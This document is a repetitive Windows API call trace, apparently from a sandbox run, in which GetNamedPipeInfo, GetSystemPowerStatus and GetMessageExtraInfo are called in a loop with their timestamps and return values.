	[0129.289] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.289] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.289] GetMessageExtraInfo () returned 0x0
	[0129.290] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.290] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.290] GetMessageExtraInfo () returned 0x0
	[0129.291] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.291] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.291] GetMessageExtraInfo () returned 0x0
	[0129.292] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.292] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.292] GetMessageExtraInfo () returned 0x0
	[0129.292] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.292] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.293] GetMessageExtraInfo () returned 0x0
	[0129.295] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.295] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.295] GetMessageExtraInfo () returned 0x0
	[0129.295] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.295] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.296] GetMessageExtraInfo () returned 0x0
	[0129.296] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.296] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.296] GetMessageExtraInfo () returned 0x0
	[0129.297] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.297] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.297] GetMessageExtraInfo () returned 0x0
	[0129.298] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.298] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.298] GetMessageExtraInfo () returned 0x0
	[0129.299] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.299] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.299] GetMessageExtraInfo () returned 0x0
	[0129.299] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.299] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.299] GetMessageExtraInfo () returned 0x0
	[0129.300] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.300] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.300] GetMessageExtraInfo () returned 0x0
	[0129.301] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.301] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.301] GetMessageExtraInfo () returned 0x0
	[0129.301] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.301] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.301] GetMessageExtraInfo () returned 0x0
	[0129.302] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.302] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.302] GetMessageExtraInfo () returned 0x0
	[0129.302] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.302] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.303] GetMessageExtraInfo () returned 0x0
	[0129.303] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.303] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.303] GetMessageExtraInfo () returned 0x0
	[0129.384] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.384] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.384] GetMessageExtraInfo () returned 0x0
	[0129.385] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.385] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.385] GetMessageExtraInfo () returned 0x0
	[0129.385] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.385] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.385] GetMessageExtraInfo () returned 0x0
	[0129.386] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.386] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.386] GetMessageExtraInfo () returned 0x0
	[0129.387] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.387] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.387] GetMessageExtraInfo () returned 0x0
	[0129.388] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.388] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.388] GetMessageExtraInfo () returned 0x0
	[0129.395] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.395] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.395] GetMessageExtraInfo () returned 0x0
	[0129.396] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.396] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.396] GetMessageExtraInfo () returned 0x0
	[0129.397] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.397] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.397] GetMessageExtraInfo () returned 0x0
	[0129.398] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.398] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.398] GetMessageExtraInfo () returned 0x0
	[0129.399] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.399] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.399] GetMessageExtraInfo () returned 0x0
	[0129.405] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.405] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.405] GetMessageExtraInfo () returned 0x0
	[0129.407] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.407] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.407] GetMessageExtraInfo () returned 0x0
	[0129.407] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.407] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.407] GetMessageExtraInfo () returned 0x0
	[0129.408] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.408] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.408] GetMessageExtraInfo () returned 0x0
	[0129.409] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.409] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.409] GetMessageExtraInfo () returned 0x0
	[0129.410] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.410] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.410] GetMessageExtraInfo () returned 0x0
	[0129.411] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.411] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.411] GetMessageExtraInfo () returned 0x0
	[0129.412] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.412] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.412] GetMessageExtraInfo () returned 0x0
	[0129.412] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.412] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.412] GetMessageExtraInfo () returned 0x0
	[0129.413] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.413] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.413] GetMessageExtraInfo () returned 0x0
	[0129.414] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.414] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.414] GetMessageExtraInfo () returned 0x0
	[0129.415] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.415] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.415] GetMessageExtraInfo () returned 0x0
	[0129.416] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.416] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.416] GetMessageExtraInfo () returned 0x0
	[0129.417] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.417] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.417] GetMessageExtraInfo () returned 0x0
	[0129.418] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.418] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.418] GetMessageExtraInfo () returned 0x0
	[0129.419] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.419] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.419] GetMessageExtraInfo () returned 0x0
	[0129.419] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.419] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.419] GetMessageExtraInfo () returned 0x0
	[0129.420] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.420] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.420] GetMessageExtraInfo () returned 0x0
	[0129.420] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.420] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.420] GetMessageExtraInfo () returned 0x0
	[0129.421] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.421] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.421] GetMessageExtraInfo () returned 0x0
	[0129.422] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.422] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.422] GetMessageExtraInfo () returned 0x0
	[0129.422] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.422] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.422] GetMessageExtraInfo () returned 0x0
	[0129.437] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.437] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.437] GetMessageExtraInfo () returned 0x0
	[0129.438] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.438] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.438] GetMessageExtraInfo () returned 0x0
	[0129.465] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.465] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.465] GetMessageExtraInfo () returned 0x0
	[0129.466] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.466] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.466] GetMessageExtraInfo () returned 0x0
	[0129.484] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.484] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.484] GetMessageExtraInfo () returned 0x0
	[0129.485] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.485] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.485] GetMessageExtraInfo () returned 0x0
	[0129.486] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.486] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.486] GetMessageExtraInfo () returned 0x0
	[0129.486] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.486] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.486] GetMessageExtraInfo () returned 0x0
	[0129.487] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.487] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.487] GetMessageExtraInfo () returned 0x0
	[0129.488] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.488] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.488] GetMessageExtraInfo () returned 0x0
	[0129.489] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.489] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.489] GetMessageExtraInfo () returned 0x0
	[0129.489] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.489] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.489] GetMessageExtraInfo () returned 0x0
	[0129.490] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.490] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.490] GetMessageExtraInfo () returned 0x0
